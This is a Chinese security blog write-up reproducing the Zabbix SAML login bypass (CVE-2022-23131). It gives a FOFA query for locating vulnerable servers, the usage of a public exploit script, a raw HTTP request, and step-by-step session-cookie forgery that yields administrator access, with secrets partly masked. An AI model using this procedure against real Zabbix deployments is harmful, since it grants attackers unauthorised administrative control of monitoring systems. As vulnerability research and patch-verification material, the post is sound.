CVE-2022-23131_Zabbix登录绕过漏洞复现
✎ 阅读须知
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!
1. 漏洞介绍
Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix Frontend 存在安全漏洞,该漏洞源于在启用SAML SSO身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对Zabbix前端的管理员访问权限。参考资料: http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202201-1030
2. 漏洞复现
fofa关键字:app="ZABBIX-监控系统" && body="saml"
攻击脚本:
https://github.com/L0ading-x/cve-2022-23131
python3 zabbix.py target Admin
•target为目标地址•Admin固定为管理员用户名•将生成的zbx_signed_session替换到当前目标的cookie中•点击登陆页面的sign in with Single Sign-On (SAML)方式登陆,即可直接进入管理界面!
python3 cve-2022-23131.py 127.0.0.1 Admin
找到该页面:
image.png
替换之后,点击使用sign in with Single Sign-On (SAML)方式登陆:
image.png
至此,进入后台管理界面:
3. exp手工复现流程
首先请求https://127.0.0.1/ 在这里会获取一个zbx_session值:
GET /index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zbx_session=eyJzZXNzaW9uaWQiOiJlNWNjNjc2ZWUzNDRlNGU4ZWIzNxxxxsIxxxxxxxxxMa1lYYXBucWp0RXpMdTFmTVJPcTArOGtxbkFLemdIMTdxUlY1VnErSkpKUGVaZHE3WG02aGtQd1wvWUxycDgrYXgzbEQ4RjF6ajlRVENHelE9PSJ9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
image.png
{"sessionid":"e5cc676ee3xxe8eb3790b521","sign":"9Fv7yJLkYXapnqjtEzLu1fMROq0+8kqnAKzgH17qRV5Vxxx7Xm6hkPw\/YLrp8+ax3lD8F1zj9QTCGzQ=="}再将数据加上默认的Admin用户:
{"saml_data":{"username_attribute":"Admin"}
将上述的结果进行拼接:
{"saml_data":{"username_attribute":"Admin"},{"sessionid":"e5cc6xxxx4e4e8eb3790b521","sign":"9Fv7yJLkYXapnqjtEzLu1fMRxxxZdq7Xm6hkPw\/YLrp8+ax3lD8F1zj9QTCGzQ=="}base64编码:
eyJzYW1sX2RhdGEiOnsidxxxxjoiQWRtaW4ifSx7InNlc3Npb25pZCI6ImU1Y2M2NzZlZTM0MDQ4NDM2NGU0ZThlYjM3OTBiNTIxIiwic2lnbiI6IjlGdjd5SkxrWVhhcG5xanRFekx1MWZNUk9xMCs4a3FuQUt6Z0gxN3FSVjVWcStKSkpQZVpkcTdYbTZoa1B3XC9ZTHJwOCtheDNsRDhGMXpqOVFUQ0d6UT09In0=然后按照上述的流程直接登陆即可!
注意:上述流程数据均已脱敏处理!!!
腾讯云开发者
